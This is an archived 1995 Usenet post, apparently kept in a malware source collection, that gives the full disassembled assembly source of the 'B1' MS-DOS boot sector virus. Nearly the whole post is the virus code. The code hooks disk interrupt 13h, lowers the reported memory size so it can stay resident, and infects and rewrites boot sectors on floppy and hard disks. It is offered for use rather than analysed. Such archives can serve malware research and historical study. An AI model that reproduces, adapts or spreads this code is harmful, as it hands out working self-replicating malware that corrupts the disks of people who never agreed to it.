MalwareSourceCode/MSDOS/B-Index/Virus.MSDOS.Unknown.b1.asm
vxunderground 4b9382ddbc re-organize
push
2022-08-21 04:07:57 -05:00

363 lines
11 KiB
NASM
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

From smtp Tue Feb 7 13:16 EST 1995
Received: from lynx.dac.neu.edu by POBOX.jwu.edu; Tue, 7 Feb 95 13:16 EST
Received: by lynx.dac.neu.edu (8.6.9/8.6.9)
id NAA01723 for joshuaw@pobox.jwu.edu; Tue, 7 Feb 1995 13:19:13 -0500
Date: Tue, 7 Feb 1995 13:19:13 -0500
From: lynx.dac.neu.edu!ekilby (Eric Kilby)
Content-Length: 10347
Content-Type: binary
Message-Id: <199502071819.NAA01723@lynx.dac.neu.edu>
To: pobox.jwu.edu!joshuaw
Subject: (fwd) B1
Newsgroups: alt.comp.virus
Status: O
Path: chaos.dac.neu.edu!usenet.eel.ufl.edu!news.bluesky.net!news.sprintlink.net!uunet!ankh.iia.org!danishm
From: danishm@iia.org ()
Newsgroups: alt.comp.virus
Subject: B1
Date: 5 Feb 1995 22:05:37 GMT
Organization: International Internet Association.
Lines: 330
Message-ID: <3h3i3h$v4@ankh.iia.org>
NNTP-Posting-Host: iia.org
X-Newsreader: TIN [version 1.2 PL2]
Here is the B1 virus:
PAGE 59,132
; Disassembled using sourcer
;[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
;[[ [[
;[[ B1 [[
;[[ [[
;[[ Created: 8-Jan-95 [[
;[[ Version: [[
;[[ Code type: zero start [[
;[[ Passes: 5 Analysis Options on: none [[
;[[ [[
;[[ [[
;[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
data_1e equ 413h ; (0000:0413=7Fh)
data_2e equ 46Dh ; (0000:046D=17E1h)
data_3e equ 4Ch ; (0006:004C=0DAh)
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 0
virus proc far
start:
jmp short loc_2 ; (0040)
db 90h, 00h, 4Dh, 4Dh, 49h, 00h
db 33h, 2Eh, 33h, 00h, 02h, 01h
db 01h, 00h, 02h,0E0h, 00h, 40h
db 0Bh,0F0h, 09h, 00h, 12h, 00h
db 02h, 00h
db 19 dup (0)
db 12h, 00h, 00h, 00h, 00h, 01h
db 00h,0FAh, 33h,0C0h, 8Eh,0D0h
db 0BCh, 00h, 7Ch, 16h, 07h
loc_2:
push cs
call sub_1 ; (00EF)
push ax
shr ax,1 ; Shift w/zeros fill
dec ah
jz loc_3 ; Jump if zero
jmp loc_14 ; (01BA)
loc_3:
push bx
push cx
push dx
push es
push si
push di
push ds
push bp
mov bp,sp
or ch,ch ; Zero ?
jnz loc_5 ; Jump if not zero
shl al,1 ; Shift w/zeros fill
jc loc_4 ; Jump if carry Set
call sub_6 ; (0190)
call sub_4 ; (017B)
jc loc_7 ; Jump if carry Set
call sub_2 ; (0127)
jz loc_4 ; Jump if zero
call sub_6 ; (0190)
call sub_3 ; (013B)
jz loc_5 ; Jump if zero
inc ah
call sub_4 ; (017B)
jc loc_5 ; Jump if carry Set
call sub_5 ; (0182)
call sub_6 ; (0190)
inc ah
call sub_4 ; (017B)
loc_4:
call sub_7 ; (019E)
or ch,dh
dec cx
jnz loc_5 ; Jump if not zero
call sub_6 ; (0190)
call sub_4 ; (017B)
jc loc_7 ; Jump if carry Set
call sub_2 ; (0127)
jnz loc_5 ; Jump if not zero
call sub_7 ; (019E)
call sub_3 ; (013B)
dec byte ptr [bp+10h]
jz loc_6 ; Jump if zero
mov al,1
call sub_4 ; (017B)
jc loc_7 ; Jump if carry Set
call sub_7 ; (019E)
add bx,di
inc cl
jmp short loc_6 ; (00BA)
loc_5:
call sub_7 ; (019E)
loc_6:
call sub_4 ; (017B)
loc_7:
pushf ; Push flags
pop bx
mov [bp+16h],bx
xchg ax,[bp+10h]
shr ah,1 ; Shift w/zeros fill
jnc loc_9 ; Jump if carry=0
xor ax,ax ; Zero register
mov ds,ax
mov ax,ds:data_2e ; (0000:046D=17E1h)
and ax,178Fh
jnz loc_9 ; Jump if not zero
call sub_6 ; (0190)
loc_8:
push ax
call sub_4 ; (017B)
xor cx,0FFC0h
nop ;*ASM fixup - sign extn byte
shl ax,1 ; Shift w/zeros fill
pop ax
jnc loc_8 ; Jump if carry=0
loc_9:
pop bp
pop ds
pop di
pop si
pop es
pop dx
pop cx
pop bx
pop ax
iret ; Interrupt return
virus endp
;__________________________________________________________________________
; SUBROUTINE
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
sub_1 proc near
mov bx,44h
mov dx,80h
mov si,data_1e ; (0000:0413=7Fh)
xor di,di ; Zero register
mov ds,di
dec word ptr [si]
lodsw ; String [si] to ax
pop si
mov cl,6
shl ax,cl ; Shift w/zeros fill
mov es,ax
sub si,bx
push si
push ax
mov ax,1AEh
push ax
push cs
push si
push cs
pop ds
call sub_5 ; (0182)
mov ds,cx
mov si,data_3e ; (0006:004C=0DAh)
mov cl,2
rep movsw ; Rep when cx >0 Mov [si] to es:[di]
mov [si-4],bx
mov [si-2],es
pop bx
pop es
retf ; Return far
sub_1 endp
;__________________________________________________________________________
; SUBROUTINE
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
sub_2 proc near
cld ; Clear direction
push cs
pop ds
xor si,si ; Zero register
mov di,bx
mov cl,40h ; '@'
push si
push di
add si,cx
add di,cx
repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di]
pop di
pop si
retn
sub_2 endp
;__________________________________________________________________________
; SUBROUTINE
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
sub_3 proc near
push ax
xor dh,dh ; Zero register
test dl,80h
jz loc_10 ; Jump if zero
mov cx,11h
jmp short loc_11 ; (0175)
loc_10:
mov ax,[di+11h]
mov cl,4
shr ax,cl ; Shift w/zeros fill
mov cx,ax
mov ax,[di+16h]
shl ax,1 ; Shift w/zeros fill
jc loc_12 ; Jump if carry Set
add ax,cx
jc loc_12 ; Jump if carry Set
xor cx,cx ; Zero register
cmp ah,[di+18h]
jae loc_12 ; Jump if above or =
div byte ptr [di+18h] ; al,ah rem = ax/data
xchg cl,ah
cmp ah,[di+1Ah]
jae loc_12 ; Jump if above or =
div byte ptr [di+1Ah] ; al,ah rem = ax/data
mov ch,al
mov dh,ah
inc cx
loc_11:
pop ax
retn
loc_12:
xor cx,cx ; Zero register
jmp short loc_11 ; (0175)
sub_3 endp
;__________________________________________________________________________
; SUBROUTINE
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
sub_4 proc near
pushf ; Push flags
call dword ptr cs:[1BCh] ; (7379:01BC=0D79h)
retn
sub_4 endp
;__________________________________________________________________________
; SUBROUTINE
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
sub_5 proc near
cld ; Clear direction
movsw ; Mov [si] to es:[di]
mov cx,17Ch
add si,3Eh
add di,3Eh
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
retn
sub_5 endp
;__________________________________________________________________________
; SUBROUTINE
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
sub_6 proc near
push cs
mov ax,200h
mov bx,ax
xor cx,cx ; Zero register
xor dh,dh ; Zero register
inc cx
inc ax
pop es
retn
sub_6 endp
;__________________________________________________________________________
; SUBROUTINE
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
sub_7 proc near
mov ax,[bp+10h]
mov bx,[bp+0Eh]
mov cx,[bp+0Ch]
mov dx,[bp+0Ah]
mov es,[bp+8]
retn
sub_7 endp
db 41h ; Inc cx ?
loc_13:
mov ax,201h
int 13h ; Disk dl=drive a ah=func 02h
; read sectors to memory es:bx
xor dl,80h
jz loc_13 ; Jump if zero
retf ; Return far
loc_14:
pop ax
;* jmp far ptr loc_1 ;*(000A:0D79)
db 0EAh, 79h, 0Dh, 0Ah, 00h
db 0Dh, 0Ah, 'Disk Boot failure', 0Dh
db 0Ah, 0
db 'IBMBIO COMIBMDOS COM'
db 18 dup (0)
db 55h,0AAh
seg_a ends
end start
ls virus.asm
ls virus.asm
--
Eric "Mad Dog" Kilby maddog@ccs.neu.edu
The Great Sporkeus Maximus ekilby@lynx.dac.neu.edu
Student at the Northeatstern University College of Computer Science
"I Can't Believe It's Not Butter"